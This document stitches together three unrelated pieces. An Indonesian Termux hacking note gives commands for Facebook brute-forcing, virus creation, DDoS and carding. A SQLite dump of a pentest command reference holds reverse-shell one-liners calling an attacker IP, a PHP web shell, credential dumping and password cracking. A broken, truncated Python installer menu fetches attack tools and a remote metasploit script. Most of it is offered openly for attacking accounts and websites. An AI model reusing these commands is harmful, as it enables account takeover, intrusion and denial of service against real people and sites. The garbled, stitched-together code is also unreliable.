-h cd /sdcard cat pas.txt Redhawk Fitur Redhawk Server detection Cloudflare detector robots scanner Whois GEO-IP Scan NMAP Port Scan DNS Lookup SubNet Calculator Subdomain Finder Reverse IP Scanner CMS detection For Sites On the same server. Parameter Finder Error based SQLi Detector Dan lain – lain. Cara install dan menjalankan Redhawk git clone https://github.com/Tuhinshubhra/RED_HAWK cd RED_HAWK chmod +x rhawk.php php rhawk.php Install SQLMAP Tools ini berguna sekali untuk kegiatan mengetes keamanan website, deface, carding dan semacamnya gi clone https://github.com/sqlmapproject/sqlmap cd sqlmap python2 sqlmap.py Cara menjalankan python2 sqlmap.py -u website.com --dbs Mengetahui semua parameter Sqlmap python2 sqlmap.py -hh Melacak IP git clone https://github.com/maldevel/IPGeolocation cd IPGeolocation chmod +x ipgeolocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t IPnya Hack Akun Facebook •pkg install python2-dev •apt install wget dip2 •install mechanize •cd/sterage/emulated/0 python2 fbbrute.py •storage/emulated/0/password.txt Membuat Virus git clone https://github.com/viruz09/CreaterVirus cd CreaterVirus python2 creater.py Cara copy virus cp agents.apk /lokasi/folder DDOS DDOS berguna untuk menyerang website dengan memberikan traffic yang tinggi sehingga website tersebut down. git clone https://github.com/4L13199/LITEDDOS python2 LITEDDOS.py [ip target atau domain] [port] [jumlah traffic] Cara Install Santet Online Di Termux Fitur Create a Netcat Payload and Listener Facebook Group Hijack Attack SMS Bomber Attack Vectors SMS Spoof Attack Vectors Denial-of-Service Attack •git clone https://github.com/Gameye98/santet-online •cd santet-online •python2 santet.py Tools B4J1N94N Fitur Nyari CC buat carding Spam akun gmail Whois lookup Dan ratusan tools lainnya •git clone https://github.com/DarknessCyberTeam/B4J1N64Nv5 •cd B4J1N64Nv5 •sh B4J1N64N.sh
Don-No7
-- -- File generated with SQLiteStudio v3.2.1 on Sun Feb 7 14:58:28 2021 -- -- Text encoding used: System -- PRAGMA foreign_keys = off; BEGIN TRANSACTION; -- Table: Commands CREATE TABLE Commands (Command_No INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, Name TEXT REFERENCES Programs (Name) NOT NULL, Description TEXT NOT NULL, Command TEXT, File BLOB); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (1, 'Kerbrute', 'brute single user password', 'kerbrute bruteuers [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (2, 'Kerbrute', 'brute username:password combos from file or stdin', 'kerbrute brutforce [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (3, 'Kerbrute', 'test a single password agains a list of users', 'kerbrute passwordspray [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (4, 'Kerbrute', 'Enumerate valid domain usernames via kerberos', 'kerbrute userenum [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (5, 'Name-That-Hash', 'Find the hash type of a string', 'nth --text ''<hash>''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (6, 'Name-That-Hash', 'Find the hash type of a file', 'nth --file <hash file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (7, 'Nmap', 'scan for vulnerabilites', 'nmap --script vuln <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (8, 'Nikto', 'Scan host for vulnerabilites', 'nikto -h <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (9, 'SMBClient', 'check for misconfigured anonymous login', 'smbclient -L \\\\<HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (10, 'Hydra', 'Brutforce a webpage looking for usernames', 'hydra -l <user wordlist> -p 123 <HOST_IP> http-post-form ''/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=<output string on failure>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (11, 'SMBMap', 'enumerates SMB file shares', 'smbmap -u <user> -p <pass> -H <host IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (12, 'WPScan', 'Enumerate Wordpress website', 'wpscan --url <wp site> --enumerate --plugins-detection', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (13, 'WPScan', 'enumerate though known usernames', 'wpscan --url <HOST_IP> --usernames <USERNAME_FOUND> --passwords wordlist.dic', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (14, 'PowerShell', 'bypass execution policy', 'powershell.exe -exec bypass', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (15, 'TheHarvester', 'gathering informaiton from online sources', 'theharvester -d <domain> -l <#> -g -b google', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (16, 'Netcat', 'open a listener', 'nc -lvnp <port #>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (17, 'Netcat', 'Connect to computer', 'nc <attacker ip> <attacker port>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (18, 'GoBuster', 'Eunmerate directories on a website with a cookie', 'gobuster dir -u http://<IP> -w <wordlist> -x <extention> -c PHPSESSID=<cookie val>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (19, 'SQLMap', 'map sql at an IP', 'sqlmap -r <IP> --batch --force-ssl', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (20, 'John the Ripper', 'Use wordlist to parse hash', 'john <HASHES_FILE> --wordlist=<wordlist>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (21, 'John the Ripper', 'unencrypt shadow file', 'john <Unshadowed passwds>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (22, 'Unshadow', 'combine /etc/passwd and /etc/shadow file for cracking', 'unshadow <passwd> <shadow>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (23, 'Hashcat', 'crack hashes with a wordlist', 'hashcat -m <hash type> -a 0 -o <output file> <hash file> <wordlist> --force', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (26, 'Enum4Linux', 'basic command', 'enum4linux -a <IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (27, 'SMBClient', 'connect to a SMB share', 'smbclinet //<IP>/<share> -U <username>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (28, 'Netcat', 'connect with shell (-e doest always work)', 'nc -e /bin/sh <ATTACKING-IP> 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (29, 'Netcat', 'connect with shell (-e doest always work)', '/bin/sh | nc ATTACKING-IP 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (30, 'Netcat', 'done on the target', 'rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (31, 'SQLMap', 'Check form for SQL injection', 'sqlmap -o -u "http://meh.com/form/" –forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (32, 'SQLMap', 'automated SQL scan', 'sqlmap -u <URL> --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (33, 'CrackMapExec', 'run a mimikatz module', 'crackmapexec smb <target(s)> -u <username> -p <password> --local-auth -M mimikatz', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (34, 'CrackMapExec', 'Command execution', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' -x whoami', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (35, 'CrackMapExec', 'check logged in users', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' --lusers', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (36, 'CrackMapExec', 'dump local SAM hashes', 'crackmapexec <target(s)> -u ''<uesrname>'' -p ''<password>'' --local-auth --sam', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (37, 'CrackMapExec', 'null session login', 'crackmapexec smb <target(s)> -u '''' -p ''''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (38, 'CrackMapExec', 'list modules', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (39, 'CrackMapExec', 'pass the hash', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (41, 'IKE-Scan', 'attack pre shared key with dictionary', 'psk-crack -d </path/to/dictionary> <psk file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (42, 'IKE-Scan', 'If you find a SonicWALL VPN using agressive mode it will require a group id, the default group id is GroupVPN', 'ike-scan <IP> -A -id GroupVPN', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (43, 'IKE-Scan', 'to find aggressive mode VPNs and save for use with psk-crack', 'ike-scan <IP> -A -P<file out>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (44, 'John the Ripper', 'crack passwords with korelogic rules', 'for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} -w:<wordlist> <password_file> ; done', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (45, 'Nmap', 'create a list of ip addresses ', 'nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (46, 'Linux commands', 'mount NFS share on linux', 'mount -t nfs server:/share /mnt/point', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (47, 'PowerShell', 'create new user', 'net user <username> <password> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (48, 'PowerShell', 'add user to a group (normaly Administrators)', 'net localgroup <group> <username> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (49, 'PSK-Crack', 'brute force with specified length and specified chars (if left blank default is 36)', 'psk-crack -b <#> --charset="<charlist>" <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (50, 'PSK-Crack', 'dictianary attack', 'psk-crack -d <file> <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (51, 'SQLMap', 'check form for SQL injection', 'sqlmap -o -u "<url of form>" --forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (52, 'SQLMap', 'Scan url for union + error based injection with mysql backend and use a random user agent + database dump', 'sqlmap -u "<form URL>?id=1>" --dbms=mysql --tech=U --random-agent --dump ', NULL); -- Table: Exploits CREATE TABLE Exploits (Target TEXT, Type TEXT, Criteria TEXT, Method TEXT, Code TEXT, Result TEXT, Notes TEXT); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Injection', 'ability to write to website folder', 'create or edit a mage of the website and insert the code to get remote access to the machine', '<? php system ($ _ GET [''cmd'']); ?>', 'execute code via url', '<URL of php>?cmd=<code to execue>'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'shell', 'enter code into the shell to find vulnerbilities int he machine', 'find / -perm -u=s -type f 2>/dev/null', 'SUID binaries', 'link output to GTFO bins and exploit'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Box', 'Priv Esc', 'Python binary running as root', 'generate a shell using python to grain root access', 'python3 -c "import pty;pty.spawn(''/bin/sh'');"', 'root shell', 'change pyton varibale acordingly'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('SQL', 'Priv Esc', 'MySQL binary running as root', 'enter into MySQL command line and break out into root y using the code', 'mysql> \! /bin/sh', 'get shell from root priv SQL', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'low privilage shell', 'use the code to search for programs that run as sudo without password', 'sudo -l', NULL, 'list programs that can be used with sudo and no password'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Windows', 'Priv Esc', 'Powershell', 'use code to enumerate priv esc opertunities', 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """', 'list of unquoted service paths that might be used for priv esc', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'LFI', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', NULL, 'use Linenum.sh to enumerate linux box', 'wget https://www.linenum.sh/ -P /dev/shm/Linenum.sh; chmod +x /dev/shm/linenum.sh ; ./dev/shm/Linenum.sh | tee /dev/shm/lininfo.txt', ' file, /dev/shm/lininfo.txt, with priv esc info', 'it is possible to use other methods of download like: curl or others found on google'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'No-Auth', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Re-Registration', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'JWT', 'a site that uses jSON as cookies', 'edit the information (with BURP) thats going to the website to gain access without authenitaction', NULL, NULL, NULL); -- Table: Programs CREATE TABLE Programs (Name text PRIMARY KEY NOT NULL UNIQUE, Stage TEXT, Description text, Info text, Features TEXT, Target TEXT, Offensive BOOLEAN, commands TEXT); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nmap', 'Enum', 'Used for scanning a network/host to gather more information', 'man pages on linux', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('BURP Suit', 'Enum, Exploit', 'A program for manipulating HTTP requests, enumeration and Exploit', 'https://portswigger.net/burp/documentation/contents', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Metasploit', 'All', 'Powerfull swiss-army-knife of hacking', 'https://docs.rapid7.com/metasploit/', NULL, 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('MSFVenom', 'Exploit', 'Designed for creating payloads', 'https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom', 'Payloads', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Snort', 'Utility', 'Packet sniffer', 'https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/000/249/original/snort_manual.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIXACIED2SPMSC7GA%2F20210128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210128T192737Z&X-Amz-Expires=172800&X-Amz-SignedHeaders=host&X-Amz-Signature=4b51dc730677d14203c4a4cde25c1831ac64e9eca8df89c6737701811fa3f9fd', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('GoBuster', 'Enum', 'A fuzzer for websites', 'man pages on linux', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hydra', 'Exploit', 'Brutforcer for wesite passwords', 'man pages on linux', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Mimikatz', 'Post', 'Used to exploit kerberos', 'https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Impacket', 'Exploit', 'The fascilitator of python bassed script that uses modules for attacking windows ', 'https://www.secureauth.com/labs-old/impacket/', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Enum4Linux', 'Enum', 'for Enumerating Windows and Samba hosts', 'man pages included, https://tools.kali.org/information-gathering/enum4linux', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Rubeus', 'Exploit', 'Used for kerberos interaction and abuse', 'https://github.com/GhostPack/Rubeus', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Kerbrute', 'Enum, Exploit', 'quickly enumerate and brutforce active directory accounts through kerberos pre-authentication', 'https://github.com/ropnop/kerbrute/', 'Brute', 'Windows', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('John the Ripper', 'Exploit', 'a password brutforcer', 'https://www.openwall.com/john/doc/', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hashcat', 'Exploit', 'A password bruteforces', 'http://manpages.org/hashcat', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Bloodhound', 'Enum', 'Network mapping tool', 'https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Wireshark', 'Utility', 'Packet sniffer', 'https://www.wireshark.org/download/docs/user-guide.pdf', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hash-Identifier', 'Utility', '(superseeded by Name-That-Hash)A simple python program for identifying hashes', 'man pages on linux', NULL, 'Hash', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Scp', 'Utility', 'For transfering files over SSH connection', 'man pages on llinux', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBClient', 'Utility', 'Used to connect to SMB file shares, can be used to enumerate shares', 'man pages on linux', 'Connect', 'SMB', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PowerShell', 'Utility', 'Powerfull comand line for Windows', 'https://www.pdq.com/powershell/', NULL, 'Windows', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Searchsploit', 'Enum', 'Local version of ExploitDB', 'https://www.exploit-db.com/searchsploit', 'Exploit Enum', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Vim', 'Utiility', 'Text editor', 'https://vimhelp.org/', NULL, 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('LinPeas', 'Post', 'For Enumerating Linux computers', 'Simply run on a linux computer', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nikto', 'Enum', 'For full enumeration on websites', 'https://cirt.net/nikto2-docs/', 'Exploit Enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Radare2', 'Utility', 'A tooll used to reverse engineer programs', 'https://github.com/radareorg/radare2/blob/master/doc/intro.md', 'Reverse', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Evil-WinRM', 'Exploit', 'Malware exuivilent of WinRM and used to exploit windows systems', 'https://github.com/Hackplayers/evil-winrm', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Seatbelt', 'Post', 'Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives', 'https://github.com/GhostPack/Seatbelt', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WinPeas', 'Post', 'For full enumeration of windows host (internal)', 'https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Lockless', 'Post', 'LockLess is a C# tool that allows for the enumeration of open file handles and the copying of locked files', 'https://github.com/GhostPack/Lockless', 'File interaction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SQLMap', 'Exploit', 'Automates the process of detecting and exploiting SQL injection flaws and taking over of database servers', 'http://sqlmap.org/', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('KEETheif', 'Post', 'Allows for the extraction of KeePass 2.X key material from memory, as well as the backdooring and enumeration of the KeePass trigger system', 'https://github.com/GhostPack/KeeThief', 'File interacction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('TheHarvester', 'Enum', 'The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database', 'https://tools.kali.org/information-gathering/theharvester', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('jSQLInjection', 'Enum', 'used for gathering SQL databse information form a distant source', 'https://tools.kali.org/vulnerability-analysis/jsql', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hping', 'Enum', 'Ping command on steroids, used to enumerating firewalls', 'https://tools.kali.org/information-gathering/hping3', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux Exploit Suggester', 'Post', 'keeps track of vulnerabilities and suggests exploits to gain root access', 'https://tools.kali.org/exploitation-tools/linux-exploit-suggester', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unix-PrivEsc-Check', 'Post', ' It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps, written in a single shell script so is easy to upload', 'https://tools.kali.org/vulnerability-analysis/unix-privesc-check', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Dotdotpwn', 'Enum', 'It’s a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers', 'https://tools.kali.org/information-gathering/dotdotpwn', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Websploit', 'Enum, Exploit', 'Swiss-army-knife of web exploits ranging from social engineering to honeypots and everything in between', 'https://tools.kali.org/web-applications/websploit', NULL, 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('XSSer', 'Enum', 'To detect, exploit and report XSS vulnerabilities in web-based applications', 'https://tools.kali.org/web-applications/xsser', 'Exploit enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Name-That-Hash', 'Utility', 'Hash-identifier with more deatils and command line based', 'https://github.com/HashPals/Name-That-Hash', NULL, 'N/A', 'N', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBMap', 'Enum', 'enumerate shares over a domin', 'https://tools.kali.org/information-gathering/smbmap', 'Scanning', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Redis-Cli', 'Exploit', 'used for interacting and exploiting reddis-cli on port 6379', 'https://book.hacktricks.xyz/pentesting/6379-pentesting-redis ; https://redis.io/topics/rediscli', 'SQL', 'SQL', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unshadow', 'POST', 'Combining passwd and shadow files into 1', 'simply use: unshadow <passwd file> <shadow file> > <output file>', 'Passwords', 'Hash', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WPScan', 'Enum', 'Look for vulnerabilities in wordpress site', 'https://github.com/wpscanteam/wpscan', 'Scanning', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Netcat', 'Utility', 'used for connecting 2 computers', 'https://www.win.tue.nl/~aeb/linux/hh/netcat_tutorial.pdf', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux commands', 'Post', 'Linux commands used for Priv esc', 'https://gtfobins.github.io, https://wadcoms.github.io', 'Priv Esc', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CrackMapExec', 'Enum,, Exploit', 'Swis army knife of network testing', 'https://ptestmethod.readthedocs.io/en/latest/cme.html', 'Scanning, Exploit', 'Networks', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('IKE-Scan', 'Enum', 'Used to dicover, fingerprint and test IPsec VPN systems', 'http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide', 'Scanning', 'VPN', NULL, NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PSK-Crack', 'Exploit', 'attempts to crack IKE Aggressive Mode pre-shared keys that have previously been gathered using ike-scan with the --pskcrack option', 'https://linux.die.net/man/1/psk-crack', 'Connect, Brute', 'Wifi', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CeWL', 'Enum', 'spiders a given url returning a wordlist that is intednded for cracking passwords', 'https://tools.kali.org/password-attacks/cewl', 'Brute', 'Web', 'Y', NULL); COMMIT TRANSACTION; PRAGMA foreign_keys = on;
DylanGustaveEiffel
import os def menu(): print(""" .########..#######...#######..##........######...######. ....##....##.....##.##.....##.##.......##....##.##....## ....##....##.....##.##.....##.##.......##.......##...... ....##....##.....##.##.....##.##........######...######. ....##....##.....##.##.....##.##.............##.......## ....##....##.....##.##.....##.##.......##....##.##....## ....##.....#######...#######..########..######...######. ======================================== Created By AnonHacker Channel: youtube.com/kalinuxx Facebook: facebook.com/kalinuxtutorials Ver: 2.0 ---- ONLY FOR TERMUX! ---- ========================================== 00. Turn your Android into Hacking Machine. ------------------------------------------ 1. Install Nmap 2. Install Hydra 3. Install SQLMap 4. Install Metasploit 5. Install ngrok 6. Install Kali Nethunter 7. Install angryFuzzer 8. Install Red_Hawk 9. Install Weeman 10. Install IPGeoLocation 11. Install Cupp 12. Instagram Bruteforcer (instahack) 13. Twitter Bruteforcer (TwitterSniper) 14. Install Ubuntu 15. Install Fedora 16. Install viSQL 17. Install Hash-Buster 18. Install D-TECT 19. Install routersploit ------------------------------------------ 99. Exit ========================================== """) loop = True while loop: menu() what = input("#: ") if what == "00": print("================================") print("This will install: nmap, hydra, sqlmap, metasploit, ngrok, angryFuzzer, red_hawk, weeman, IPGeoLocation, cupp, instahack, TwitterSniper, Hash-Buster, D-TECT, routersploit and viSQL with one click.") print("----------------") hm = input("[?] Do you want to continue? (y/n): ") print("================================") if hm == "y": print("========================================================") print("[+] Please put down you android and go to the toilet...") print("Because this will take a long time.") print("========================================================") os.system("pkg update") os.system("pkg install -y git") os.system("pkg install -y python") os.system("pkg install -y python2") os.system("pkg install -y wget") os.sysetm("pkg install -y nmap") os.system("plg install -y hydra ") os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install python2") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/sqlmapproject/sqlmap.git") os.system("cd /data/data/com.termux/files/home") os.system("pkg install wget") os.system("cd /data/data/com.termux/files/home && wget https://Auxilus.github.io/metasploit.sh") os.system("cd /data/data/com.termux/files/home && bash metasploit.sh") os.system("cd /data/data/com.termux/files/home && cd metasploit-framework") os.system("cd /data/data/com.termux/files/home && gem install bundle --pre") os.system("cd /data/data/com.termux/files/home && bundle config build.nokogiri --use-system-libraries") os.system("cd /data/data/com.termux/files/home && bundle install") os.system("cd /data/data/com.termux/files/home") os.system("pkg update -y") os.system("pkg install -y git") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/themastersunil/ngrok.git") os.system("cd /data/data/com.termux/files/home") os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install -y python2") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/ihebski/angryFuzzer.git") os.system("cd /data/data/com.termux/files/home && cd angryFuzzer") os.system("cd /data/data/com.termux/files/home && pip2 install -r requirements.txt") os.system("cd /data/data/com.termux/files/home && pip2 install requests") os.system("cd /data/data/com.termux/files/home") os.system("pkg update -y") os.system("pkg install -y git") os.system("pkg install -y php") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/Tuhinshubhra/RED_HAWK") os.system("cd /data/data/com.termux/files/home") os.system("pkg update -y") os.system("pkg install -y python2") os.system("pkg install -y git") os.system("cd /data/data/com.termux/files/home && git clone https://github.com/evait-security/weeman.git") os.system("cd 